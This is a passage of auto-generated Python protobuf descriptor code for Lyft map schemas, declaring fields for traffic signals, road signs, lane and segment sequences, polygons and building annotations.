has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_green_face', index=8,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_left_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_left_arrow_red_face', index=9,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_left_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_left_arrow_yellow_face', index=10,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_left_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_left_arrow_green_face', index=11,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_right_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_right_arrow_red_face', index=12,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_right_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_right_arrow_yellow_face', index=13,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_right_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_right_arrow_green_face', index=14,
number=33, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_left_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_left_arrow_red_face', index=15,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_left_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_left_arrow_yellow_face', index=16,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_left_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_left_arrow_green_face', index=17,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_right_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_right_arrow_red_face', index=18,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_right_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_right_arrow_yellow_face', index=19,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_right_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_right_arrow_green_face', index=20,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_red_u_turn', full_name='pb.lyft.maps.TrafficControlElement.signal_red_u_turn', index=21,
number=44, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_yellow_u_turn', full_name='pb.lyft.maps.TrafficControlElement.signal_yellow_u_turn', index=22,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_green_u_turn', full_name='pb.lyft.maps.TrafficControlElement.signal_green_u_turn', index=23,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_bump', full_name='pb.lyft.maps.TrafficControlElement.speed_bump', index=24,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_hump', full_name='pb.lyft.maps.TrafficControlElement.speed_hump', index=25,
number=34, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pedestrian_crosswalk', full_name='pb.lyft.maps.TrafficControlElement.pedestrian_crosswalk', index=26,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='keep_clear_zone', full_name='pb.lyft.maps.TrafficControlElement.keep_clear_zone', index=27,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pedestrian_crossing_sign', full_name='pb.lyft.maps.TrafficControlElement.pedestrian_crossing_sign', index=28,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_ahead_sign', full_name='pb.lyft.maps.TrafficControlElement.signal_ahead_sign', index=29,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_left_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_left_turn_sign', index=30,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_right_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_right_turn_sign', index=31,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='left_turn_yield_on_green_sign', full_name='pb.lyft.maps.TrafficControlElement.left_turn_yield_on_green_sign', index=32,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_parking_sign', full_name='pb.lyft.maps.TrafficControlElement.no_parking_sign', index=33,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='one_way_sign', full_name='pb.lyft.maps.TrafficControlElement.one_way_sign', index=34,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='school_zone_sign', full_name='pb.lyft.maps.TrafficControlElement.school_zone_sign', index=35,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parking_zone', full_name='pb.lyft.maps.TrafficControlElement.parking_zone', index=36,
number=35, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_bump_sign', full_name='pb.lyft.maps.TrafficControlElement.speed_bump_sign', index=37,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='construction_zone', full_name='pb.lyft.maps.TrafficControlElement.construction_zone', index=38,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stop_here_for_pedestrians_sign', full_name='pb.lyft.maps.TrafficControlElement.stop_here_for_pedestrians_sign', index=39,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state_law_stop_for_pedestrian_in_crosswalk_sign', full_name='pb.lyft.maps.TrafficControlElement.state_law_stop_for_pedestrian_in_crosswalk_sign', index=40,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_here_for_pedestrians_sign', full_name='pb.lyft.maps.TrafficControlElement.yield_here_for_pedestrians_sign', index=41,
number=52, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='turning_vehicles_yield_to_pedestrians_sign', full_name='pb.lyft.maps.TrafficControlElement.turning_vehicles_yield_to_pedestrians_sign', index=42,
number=53, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state_law_yield_for_pedestrian_sign', full_name='pb.lyft.maps.TrafficControlElement.state_law_yield_for_pedestrian_sign', index=43,
number=54, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='railroad_crossing_regulatory_sign', full_name='pb.lyft.maps.TrafficControlElement.railroad_crossing_regulatory_sign', index=44,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='railroad_crossing_warning_sign', full_name='pb.lyft.maps.TrafficControlElement.railroad_crossing_warning_sign', index=45,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='railroad_crossing_other_sign', full_name='pb.lyft.maps.TrafficControlElement.railroad_crossing_other_sign', index=46,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roundabout_circulation_sign', full_name='pb.lyft.maps.TrafficControlElement.roundabout_circulation_sign', index=47,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roundabout_directional_sign', full_name='pb.lyft.maps.TrafficControlElement.roundabout_directional_sign', index=48,
number=59, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roundabout_other_sign', full_name='pb.lyft.maps.TrafficControlElement.roundabout_other_sign', index=49,
number=60, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_left_turn_on_red_sign', full_name='pb.lyft.maps.TrafficControlElement.no_left_turn_on_red_sign', index=50,
number=61, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_right_turn_on_red_sign', full_name='pb.lyft.maps.TrafficControlElement.no_right_turn_on_red_sign', index=51,
number=62, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_turn_on_red_sign', full_name='pb.lyft.maps.TrafficControlElement.no_turn_on_red_sign', index=52,
number=63, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='do_not_enter_sign', full_name='pb.lyft.maps.TrafficControlElement.do_not_enter_sign', index=53,
number=64, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_u_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_u_turn_sign', index=54,
number=65, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_left_and_u_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_left_and_u_turn_sign', index=55,
number=66, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_straight_through_sign', full_name='pb.lyft.maps.TrafficControlElement.no_straight_through_sign', index=56,
number=67, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='left_turn_only_sign', full_name='pb.lyft.maps.TrafficControlElement.left_turn_only_sign', index=57,
number=68, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='right_turn_only_sign', full_name='pb.lyft.maps.TrafficControlElement.right_turn_only_sign', index=58,
number=69, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='u_turn_only_sign', full_name='pb.lyft.maps.TrafficControlElement.u_turn_only_sign', index=59,
number=70, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='straight_through_only_sign', full_name='pb.lyft.maps.TrafficControlElement.straight_through_only_sign', index=60,
number=71, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='other_turn_restriction_sign', full_name='pb.lyft.maps.TrafficControlElement.other_turn_restriction_sign', index=61,
number=72, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='construction_zone_sign', full_name='pb.lyft.maps.TrafficControlElement.construction_zone_sign', index=62,
number=73, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='geo_frame', full_name='pb.lyft.maps.TrafficControlElement.geo_frame', index=63,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='points_x_deltas_cm', full_name='pb.lyft.maps.TrafficControlElement.points_x_deltas_cm', index=64,
number=3, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='points_y_deltas_cm', full_name='pb.lyft.maps.TrafficControlElement.points_y_deltas_cm', index=65,
number=4, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='points_z_deltas_cm', full_name='pb.lyft.maps.TrafficControlElement.points_z_deltas_cm', index=66,
number=5, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='geometry_type', full_name='pb.lyft.maps.TrafficControlElement.geometry_type', index=67,
number=48, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='controlled_paths', full_name='pb.lyft.maps.TrafficControlElement.controlled_paths', index=68,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK, _TRAFFICCONTROLELEMENT_AUXILIARYELEMENT, _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE, _TRAFFICCONTROLELEMENT_TRAFFICLIGHT, ],
enum_types=[
_TRAFFICCONTROLELEMENT_GEOMETRYTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='pb.lyft.maps.TrafficControlElement.Type',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=4897,
serialized_end=10334,
)
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION = _descriptor.Descriptor(
name='SegmentWithOrientation',
full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='segment', full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation.segment', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orientation', full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation.orientation', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10479,
serialized_end=10686,
)
_SEGMENTSEQUENCE = _descriptor.Descriptor(
name='SegmentSequence',
full_name='pb.lyft.maps.SegmentSequence',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='pb.lyft.maps.SegmentSequence.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='segments', full_name='pb.lyft.maps.SegmentSequence.segments', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION, ],
enum_types=[
_SEGMENTSEQUENCE_TYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10337,
serialized_end=10737,
)
_LANESEQUENCE = _descriptor.Descriptor(
name='LaneSequence',
full_name='pb.lyft.maps.LaneSequence',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lanes', full_name='pb.lyft.maps.LaneSequence.lanes', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10739,
serialized_end=10792,
)
_LANESEQUENCES = _descriptor.Descriptor(
name='LaneSequences',
full_name='pb.lyft.maps.LaneSequences',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lane_sequences', full_name='pb.lyft.maps.LaneSequences.lane_sequences', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10794,
serialized_end=10861,
)
_POLYGON = _descriptor.Descriptor(
name='Polygon',
full_name='pb.lyft.maps.Polygon',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='shell_vertices', full_name='pb.lyft.maps.Polygon.shell_vertices', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='holes', full_name='pb.lyft.maps.Polygon.holes', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10863,
serialized_end=10961,
)
_MULTIPOLYGON = _descriptor.Descriptor(
name='MultiPolygon',
full_name='pb.lyft.maps.MultiPolygon',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='polygons', full_name='pb.lyft.maps.MultiPolygon.polygons', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10963,
serialized_end=11018,
)
_ANNOTATEDSHAPE_BUILDING = _descriptor.Descriptor(
name='Building',
full_name='pb.lyft.maps.AnnotatedShape.Building',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='pb.lyft.maps.AnnotatedShape.Building.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='height_meters', full_name='pb.lyft.maps.AnnotatedShape.Building.height_meters', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='above_ground_floors', full_name='pb.lyft.maps.AnnotatedShape.Building.above_ground_floors', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ANNOTATEDSHAPE_BUILDING_TYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
